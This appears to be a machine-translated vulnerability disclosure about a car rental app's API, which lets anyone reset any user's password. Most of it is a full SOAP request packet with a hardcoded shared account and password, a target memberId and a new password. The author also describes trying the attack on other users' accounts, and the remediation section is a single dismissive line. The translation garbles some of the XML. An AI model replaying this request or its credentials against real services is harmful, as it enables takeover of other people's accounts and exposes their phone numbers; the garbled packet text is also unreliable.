Change the password of any user for Car Rental in Shenzhou

The problem lies in the app end of car rental in China. The verification mechanism is designed to be too fragile ~ The following is the request packet for modifying the user's personal data. The verification part of the account and password in the data packet is the same value for all users, and there is no other authentication mechanism, so here we can certainly modify the value of any user ~

POST http://sdk.zuche.com/CARSDK/services/zuche1 HTTP/1.1 Host: sdk. zuche. comConnection: closeAccept-Encoding: gzipContent-Type: text/xml; charset = utf-8Content-Length: 526 Connection: closeSOAPAction: http://sdk.zuche.com/CARSDK/services/zuche1? UpdateUserUser-Agent: Car Rental in China 2.6 (iPhone; iPhone OS 7.0.4; zh_CN) <? Xml version = '1. 0' encoding = 'utf-8'?> <Soap: Envelope xmlns: xsi = 'HTTP: // your xmlns: xsd = 'HTTP: // www.w3.org/2001/XMLSchema' xmlns: soap = 'HTTP: // your> <soap: header> <CheckSoap xmlns = 'HTTP: // tempuri.org/'> <Account> szzciphone </Account> <Password> szzc # iphone </Password> </CheckSoap> </soap: Header> <soap: body> <UpdateUser xmlns = 'HTTP: // tempuri.org/'> <User> {"memberId": "3xxxx3", "password": "123qwe", "emailaddress ": "xxxxx@sina.cn"} </User> </UpdateUser> </soap: Body> </soap: Envelope>

 

Therefore, we can modify the information of any user by modifying the memberId. If the emailaddress parameter is null, the user's original value will not be changed, after changing the password of a user with different IDs, the system will return the user's account information (mobile phone number). With the mobile phone number, we can log on to any user's account, the following is the test result of my own account. Let's test a user's account at will. This is the proof;

Solution:Various verifications, not mentioned ~